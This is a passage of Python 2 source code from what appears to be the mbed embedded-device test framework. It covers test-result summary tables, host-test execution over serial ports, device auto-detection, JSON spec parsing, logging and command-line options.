unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str.split(',')
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s())
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_BIN_PATH:
toolchain_path = TOOLCHAIN_BIN_PATH[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from workspace_tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter.split(','):
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = optparse.OptionParser()
parser.add_option('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
help='Points to file with test specification')
parser.add_option('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_option("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type="int",
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_option('', '--auto',
dest='auto_detect',
metavar=False,
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
parser.add_option('', '--tc',
dest='toolchains_filter',
help="Toolchain filter for --auto option. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_option('', '--oper',
dest='operability_checks',
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_option('', '--clean',
dest='clean',
metavar=False,
action="store_true",
help='Clean the build directory')
parser.add_option('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_option('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_option('-n', '--test-by-names',
dest='test_by_names',
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_option('-p', '--peripheral-by-names',
dest='peripheral_by_names',
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_option('-c', '--copy-method',
dest='copy_method',
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
